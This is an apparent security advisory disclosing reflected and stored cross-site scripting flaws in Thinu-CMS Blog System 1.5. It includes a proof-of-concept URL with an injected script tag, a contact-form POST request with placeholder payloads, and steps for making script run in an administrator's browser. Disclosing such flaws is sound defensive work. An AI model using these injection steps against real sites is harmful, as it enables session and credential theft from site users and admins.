Thinu-CMS Blog System version 1.5 suffers from reflective and persistent cross site scripting vulnerabilities.
10c1c559267e5793733d8d87552c5f87d03674657debd955fd0f530bcec3c738
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://www.codester.com/items/40401/ │
│ Vendor : Thinu Tech │
│ Software : Thinu-CMS Blog System 1.5 │
│ Vuln Type: Reflected XSS - Stored XSS │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ Reflected XSS │
│ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
│ │
│ Stored XSS │
│ │
│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │
│ information, manipulate data, and launch additional attacks. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /author_posts.php
GET 'author' parameter is vulnerable to RXSS
http://website/author_posts.php?author=g6g12<script>alert(1)</script>o8sdm&p_id=195
## Stored XSS
-----------------------------------------------
POST /contact.php HTTP/1.1
name=[XSS Payload]&email=anything@email.com&subject=AnySubject&body=[XSS Payload]&submit=Submit+
-----------------------------------------------
POST parameter 'name' is vulnerable to XSS
POST parameter 'body' is vulnerable to XSS
## Steps to Reproduce:
#################################################################################################
1. Visit [Contact US] Page on this Path (http://website/contact.php)
2. Inject your [XSS Payload] in "User"
3. Inject your [XSS Payload] in "Message Box"
4. Press Submit
8. When ADMIN check [Contacts] in Administration Panel on this Path (https://website/admin/contacts.php)
9. XSS Will Fire and Executed on his Browser
[-] Done